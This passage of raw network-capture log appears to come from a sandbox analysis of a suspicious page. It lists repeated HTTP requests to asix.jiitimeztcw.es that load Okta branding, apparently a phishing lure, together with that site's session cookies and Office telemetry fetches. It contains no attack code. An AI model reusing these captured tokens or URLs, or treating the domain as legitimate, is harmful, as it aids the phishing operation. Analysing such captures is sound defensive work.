XSRF-TOKEN=eyJpdiI6ImxUbmtlSXJoNE5CcG5Na0pOV2doTlE9PSIsInZhbHVlIjoiTmdNQ002MVVWN0JOakoyZ2NCa1d0UWh4UFpYbzZCc1BqbHFQTEVsUjNCSzZqdEE0NXVScjc3bmt0M0d2blY2dlhNQWRqWHFSWEVrVXMwNnFWays3dVgzcDlGK0FDeFZXYm1CNzZ5azRiM3JQenRTMis3d3N4U096NFhHUUwyam0iLCJtYWMiOiJiNTdhMTY2YTVjNzM3ZjY1ZjAwNTZmNmM0Y2VhOTY4YWUzY2MzYzlmYzM2OWE3M2M1MjU4MTEzOTJlNjI2N2E1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJzTzlXQXVDdG9FYlJzTGhlYnZ3dmc9PSIsInZhbHVlIjoiblRPb2t4Z2ZCMFFpVW51ZGVudE9mSU8rV0s2VWJIWWdJd1ZzcitraCtoc0VrUldZSmM1RFVaUm9vYy9BeG5TaFVSOUd3UzNFMnVYd1JyYWVJZGhRTHJoZzE3enAxRG9Ja3k0OXNrajZBU3ZEMjJNSFRya1REMStHZmE5WlhObzMiLCJtYWMiOiIyZTk2NzcyNzFiZTk0ZTE5MGJhYzNmY2Y4NTgwNmI0YzFmYzY3ZGNlZTkwZDQwYWY5NDhhODU1ZDMyNzliZDc0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250324%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250324T183458Z&X-Amz-Expires=300&X-Amz-Signature=106c59e52187ed8365d91d251ac2458ed757598528aea816dcb41ebce89abcb3&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://asix.jiitimeztcw.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://asix.jiitimeztcw.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ijK6NMHG1afVbIAubSN5C1tODwlWMXp7xtO4NMZSvZt5jBzXuVoiu3vV3VdxPtEd4AKwwEPxuKRTcwRmoGbQRekGXwYhpqjm0ofGVTwxf63wwOJHtmKm9SmLoLmICJ2kCDXf2dUG6008i3afm9KAeD971veIJ51WZjNwx654 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImxUbmtlSXJoNE5CcG5Na0pOV2doTlE9PSIsInZhbHVlIjoiTmdNQ002MVVWN0JOakoyZ2NCa1d0UWh4UFpYbzZCc1BqbHFQTEVsUjNCSzZqdEE0NXVScjc3bmt0M0d2blY2dlhNQWRqWHFSWEVrVXMwNnFWays3dVgzcDlGK0FDeFZXYm1CNzZ5azRiM3JQenRTMis3d3N4U096NFhHUUwyam0iLCJtYWMiOiJiNTdhMTY2YTVjNzM3ZjY1ZjAwNTZmNmM0Y2VhOTY4YWUzY2MzYzlmYzM2OWE3M2M1MjU4MTEzOTJlNjI2N2E1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJzTzlXQXVDdG9FYlJzTGhlYnZ3dmc9PSIsInZhbHVlIjoiblRPb2t4Z2ZCMFFpVW51ZGVudE9mSU8rV0s2VWJIWWdJd1ZzcitraCtoc0VrUldZSmM1RFVaUm9vYy9BeG5TaFVSOUd3UzNFMnVYd1JyYWVJZGhRTHJoZzE3enAxRG9Ja3k0OXNrajZBU3ZEMjJNSFRya1REMStHZmE5WlhObzMiLCJtYWMiOiIyZTk2NzcyNzFiZTk0ZTE5MGJhYzNmY2Y4NTgwNmI0YzFmYzY3ZGNlZTkwZDQwYWY5NDhhODU1ZDMyNzliZDc0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijUW6cAfF3K4eh1pgOKAw1cLH2CmV89Dm9p0otU3LlE4xwv3S3k5JAwuqVnkyz224 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImxUbmtlSXJoNE5CcG5Na0pOV2doTlE9PSIsInZhbHVlIjoiTmdNQ002MVVWN0JOakoyZ2NCa1d0UWh4UFpYbzZCc1BqbHFQTEVsUjNCSzZqdEE0NXVScjc3bmt0M0d2blY2dlhNQWRqWHFSWEVrVXMwNnFWays3dVgzcDlGK0FDeFZXYm1CNzZ5azRiM3JQenRTMis3d3N4U096NFhHUUwyam0iLCJtYWMiOiJiNTdhMTY2YTVjNzM3ZjY1ZjAwNTZmNmM0Y2VhOTY4YWUzY2MzYzlmYzM2OWE3M2M1MjU4MTEzOTJlNjI2N2E1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJzTzlXQXVDdG9FYlJzTGhlYnZ3dmc9PSIsInZhbHVlIjoiblRPb2t4Z2ZCMFFpVW51ZGVudE9mSU8rV0s2VWJIWWdJd1ZzcitraCtoc0VrUldZSmM1RFVaUm9vYy9BeG5TaFVSOUd3UzNFMnVYd1JyYWVJZGhRTHJoZzE3enAxRG9Ja3k0OXNrajZBU3ZEMjJNSFRya1REMStHZmE5WlhObzMiLCJtYWMiOiIyZTk2NzcyNzFiZTk0ZTE5MGJhYzNmY2Y4NTgwNmI0YzFmYzY3ZGNlZTkwZDQwYWY5NDhhODU1ZDMyNzliZDc0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /bcZi5xLDaE5HSnMwzOs2nqEiNRjI64TDL9YoYgStZo05C31IfL5bA4X3ZxCg1DmtUfCPc7A4DU3ncS8xQ46WymneSnYPdSfafDmzsDiTo4dPOH0RZ8MChM5iBMY2SuaZY77EyMDDIoLQvd3UlmAKOJ8jNjk3WjtsDNqlcd670 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImxUbmtlSXJoNE5CcG5Na0pOV2doTlE9PSIsInZhbHVlIjoiTmdNQ002MVVWN0JOakoyZ2NCa1d0UWh4UFpYbzZCc1BqbHFQTEVsUjNCSzZqdEE0NXVScjc3bmt0M0d2blY2dlhNQWRqWHFSWEVrVXMwNnFWays3dVgzcDlGK0FDeFZXYm1CNzZ5azRiM3JQenRTMis3d3N4U096NFhHUUwyam0iLCJtYWMiOiJiNTdhMTY2YTVjNzM3ZjY1ZjAwNTZmNmM0Y2VhOTY4YWUzY2MzYzlmYzM2OWE3M2M1MjU4MTEzOTJlNjI2N2E1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJzTzlXQXVDdG9FYlJzTGhlYnZ3dmc9PSIsInZhbHVlIjoiblRPb2t4Z2ZCMFFpVW51ZGVudE9mSU8rV0s2VWJIWWdJd1ZzcitraCtoc0VrUldZSmM1RFVaUm9vYy9BeG5TaFVSOUd3UzNFMnVYd1JyYWVJZGhRTHJoZzE3enAxRG9Ja3k0OXNrajZBU3ZEMjJNSFRya1REMStHZmE5WlhObzMiLCJtYWMiOiIyZTk2NzcyNzFiZTk0ZTE5MGJhYzNmY2Y4NTgwNmI0YzFmYzY3ZGNlZTkwZDQwYWY5NDhhODU1ZDMyNzliZDc0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /wxbzLihqqHn3mripsOT5Db20HBaopsjMFehCA0C8VtI12123 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImxUbmtlSXJoNE5CcG5Na0pOV2doTlE9PSIsInZhbHVlIjoiTmdNQ002MVVWN0JOakoyZ2NCa1d0UWh4UFpYbzZCc1BqbHFQTEVsUjNCSzZqdEE0NXVScjc3bmt0M0d2blY2dlhNQWRqWHFSWEVrVXMwNnFWays3dVgzcDlGK0FDeFZXYm1CNzZ5azRiM3JQenRTMis3d3N4U096NFhHUUwyam0iLCJtYWMiOiJiNTdhMTY2YTVjNzM3ZjY1ZjAwNTZmNmM0Y2VhOTY4YWUzY2MzYzlmYzM2OWE3M2M1MjU4MTEzOTJlNjI2N2E1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJzTzlXQXVDdG9FYlJzTGhlYnZ3dmc9PSIsInZhbHVlIjoiblRPb2t4Z2ZCMFFpVW51ZGVudE9mSU8rV0s2VWJIWWdJd1ZzcitraCtoc0VrUldZSmM1RFVaUm9vYy9BeG5TaFVSOUd3UzNFMnVYd1JyYWVJZGhRTHJoZzE3enAxRG9Ja3k0OXNrajZBU3ZEMjJNSFRya1REMStHZmE5WlhObzMiLCJtYWMiOiIyZTk2NzcyNzFiZTk0ZTE5MGJhYzNmY2Y4NTgwNmI0YzFmYzY3ZGNlZTkwZDQwYWY5NDhhODU1ZDMyNzliZDc0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /qrLIE9HxPvWyxwe52DVNXAeftBrvSjmXcTL9WGgs3Q67140 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImxUbmtlSXJoNE5CcG5Na0pOV2doTlE9PSIsInZhbHVlIjoiTmdNQ002MVVWN0JOakoyZ2NCa1d0UWh4UFpYbzZCc1BqbHFQTEVsUjNCSzZqdEE0NXVScjc3bmt0M0d2blY2dlhNQWRqWHFSWEVrVXMwNnFWays3dVgzcDlGK0FDeFZXYm1CNzZ5azRiM3JQenRTMis3d3N4U096NFhHUUwyam0iLCJtYWMiOiJiNTdhMTY2YTVjNzM3ZjY1ZjAwNTZmNmM0Y2VhOTY4YWUzY2MzYzlmYzM2OWE3M2M1MjU4MTEzOTJlNjI2N2E1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJzTzlXQXVDdG9FYlJzTGhlYnZ3dmc9PSIsInZhbHVlIjoiblRPb2t4Z2ZCMFFpVW51ZGVudE9mSU8rV0s2VWJIWWdJd1ZzcitraCtoc0VrUldZSmM1RFVaUm9vYy9BeG5TaFVSOUd3UzNFMnVYd1JyYWVJZGhRTHJoZzE3enAxRG9Ja3k0OXNrajZBU3ZEMjJNSFRya1REMStHZmE5WlhObzMiLCJtYWMiOiIyZTk2NzcyNzFiZTk0ZTE5MGJhYzNmY2Y4NTgwNmI0YzFmYzY3ZGNlZTkwZDQwYWY5NDhhODU1ZDMyNzliZDc0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijK6NMHG1afVbIAubSN5C1tODwlWMXp7xtO4NMZSvZt5jBzXuVoiu3vV3VdxPtEd4AKwwEPxuKRTcwRmoGbQRekGXwYhpqjm0ofGVTwxf63wwOJHtmKm9SmLoLmICJ2kCDXf2dUG6008i3afm9KAeD971veIJ51WZjNwx654 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImxUbmtlSXJoNE5CcG5Na0pOV2doTlE9PSIsInZhbHVlIjoiTmdNQ002MVVWN0JOakoyZ2NCa1d0UWh4UFpYbzZCc1BqbHFQTEVsUjNCSzZqdEE0NXVScjc3bmt0M0d2blY2dlhNQWRqWHFSWEVrVXMwNnFWays3dVgzcDlGK0FDeFZXYm1CNzZ5azRiM3JQenRTMis3d3N4U096NFhHUUwyam0iLCJtYWMiOiJiNTdhMTY2YTVjNzM3ZjY1ZjAwNTZmNmM0Y2VhOTY4YWUzY2MzYzlmYzM2OWE3M2M1MjU4MTEzOTJlNjI2N2E1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJzTzlXQXVDdG9FYlJzTGhlYnZ3dmc9PSIsInZhbHVlIjoiblRPb2t4Z2ZCMFFpVW51ZGVudE9mSU8rV0s2VWJIWWdJd1ZzcitraCtoc0VrUldZSmM1RFVaUm9vYy9BeG5TaFVSOUd3UzNFMnVYd1JyYWVJZGhRTHJoZzE3enAxRG9Ja3k0OXNrajZBU3ZEMjJNSFRya1REMStHZmE5WlhObzMiLCJtYWMiOiIyZTk2NzcyNzFiZTk0ZTE5MGJhYzNmY2Y4NTgwNmI0YzFmYzY3ZGNlZTkwZDQwYWY5NDhhODU1ZDMyNzliZDc0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /dpk6vyIfh8hGqWI3TfqudHEv9D38iXl8OsPF44IRmxiMU5zWCDL1v HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IitOc3FVb1VzWFhnVzFaNzIrSFo3Y2c9PSIsInZhbHVlIjoia2hQeGRiTGQ0RHNMM2FDNU5pR2RTZ0dBV29HbDRqOTBrTjFycWExQ1R3dU5SRTE1VCtwbjNaMWE1Si96S0VvQzZxaXJCNDFnY3JoUXI5bXhxN1c5RHk2dU40L0ljdWl3TUpFREF0ak5rZlJNSEltSUlIaDExcjdTWmhiMVFaQkQiLCJtYWMiOiJmNGM3MzFmODgzMzdmMmIxNjMwZDI2N2YyMzcyNWY0MzBhYTUxOTUxNGY4OWQxZTU0ZWM1NzY5ZGFjN2MyYzFhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikc5SlBxVElKdmZRMm11UUJPc1J2UFE9PSIsInZhbHVlIjoielJ4RG5POWhyS1VsR3J1M3h0R1NRREJGWkRYbWZRWW4yYkNTY2FXc1czME8xSWF4Q0c3NzlUMzNNMjdLL3JVTmJDR3MxOGNuZnQ1ekVITjlGcG1IbGJLeDVGMmZ1OHJ1dTVOd1FadzU0ZmtvdHZhcnVVZmJFMFN5YUkwdGRyUWIiLCJtYWMiOiIxZTc4MjA2YWUzZGNhYmZlMWRiMTUxYmY1NDM1OTYzZTk0NThlNzBiMzQ4MTRjMDNmMjQzNmZjMWRmNzliMjI3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /mnehY4yqqFrD60BTLfVjR0Zav2TfuvKMrVqdygPxhqFJZP9m78143 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IitOc3FVb1VzWFhnVzFaNzIrSFo3Y2c9PSIsInZhbHVlIjoia2hQeGRiTGQ0RHNMM2FDNU5pR2RTZ0dBV29HbDRqOTBrTjFycWExQ1R3dU5SRTE1VCtwbjNaMWE1Si96S0VvQzZxaXJCNDFnY3JoUXI5bXhxN1c5RHk2dU40L0ljdWl3TUpFREF0ak5rZlJNSEltSUlIaDExcjdTWmhiMVFaQkQiLCJtYWMiOiJmNGM3MzFmODgzMzdmMmIxNjMwZDI2N2YyMzcyNWY0MzBhYTUxOTUxNGY4OWQxZTU0ZWM1NzY5ZGFjN2MyYzFhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikc5SlBxVElKdmZRMm11UUJPc1J2UFE9PSIsInZhbHVlIjoielJ4RG5POWhyS1VsR3J1M3h0R1NRREJGWkRYbWZRWW4yYkNTY2FXc1czME8xSWF4Q0c3NzlUMzNNMjdLL3JVTmJDR3MxOGNuZnQ1ekVITjlGcG1IbGJLeDVGMmZ1OHJ1dTVOd1FadzU0ZmtvdHZhcnVVZmJFMFN5YUkwdGRyUWIiLCJtYWMiOiIxZTc4MjA2YWUzZGNhYmZlMWRiMTUxYmY1NDM1OTYzZTk0NThlNzBiMzQ4MTRjMDNmMjQzNmZjMWRmNzliMjI3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijUW6cAfF3K4eh1pgOKAw1cLH2CmV89Dm9p0otU3LlE4xwv3S3k5JAwuqVnkyz224 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IitOc3FVb1VzWFhnVzFaNzIrSFo3Y2c9PSIsInZhbHVlIjoia2hQeGRiTGQ0RHNMM2FDNU5pR2RTZ0dBV29HbDRqOTBrTjFycWExQ1R3dU5SRTE1VCtwbjNaMWE1Si96S0VvQzZxaXJCNDFnY3JoUXI5bXhxN1c5RHk2dU40L0ljdWl3TUpFREF0ak5rZlJNSEltSUlIaDExcjdTWmhiMVFaQkQiLCJtYWMiOiJmNGM3MzFmODgzMzdmMmIxNjMwZDI2N2YyMzcyNWY0MzBhYTUxOTUxNGY4OWQxZTU0ZWM1NzY5ZGFjN2MyYzFhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikc5SlBxVElKdmZRMm11UUJPc1J2UFE9PSIsInZhbHVlIjoielJ4RG5POWhyS1VsR3J1M3h0R1NRREJGWkRYbWZRWW4yYkNTY2FXc1czME8xSWF4Q0c3NzlUMzNNMjdLL3JVTmJDR3MxOGNuZnQ1ekVITjlGcG1IbGJLeDVGMmZ1OHJ1dTVOd1FadzU0ZmtvdHZhcnVVZmJFMFN5YUkwdGRyUWIiLCJtYWMiOiIxZTc4MjA2YWUzZGNhYmZlMWRiMTUxYmY1NDM1OTYzZTk0NThlNzBiMzQ4MTRjMDNmMjQzNmZjMWRmNzliMjI3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /klQjXXsK6UHY13vEvfc0gBMyW0bvmYMRYrXBcdip5HMwaBOlPuWhUBBahVqb78170 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IitOc3FVb1VzWFhnVzFaNzIrSFo3Y2c9PSIsInZhbHVlIjoia2hQeGRiTGQ0RHNMM2FDNU5pR2RTZ0dBV29HbDRqOTBrTjFycWExQ1R3dU5SRTE1VCtwbjNaMWE1Si96S0VvQzZxaXJCNDFnY3JoUXI5bXhxN1c5RHk2dU40L0ljdWl3TUpFREF0ak5rZlJNSEltSUlIaDExcjdTWmhiMVFaQkQiLCJtYWMiOiJmNGM3MzFmODgzMzdmMmIxNjMwZDI2N2YyMzcyNWY0MzBhYTUxOTUxNGY4OWQxZTU0ZWM1NzY5ZGFjN2MyYzFhIiwidGFnIjoiIn0%3D; 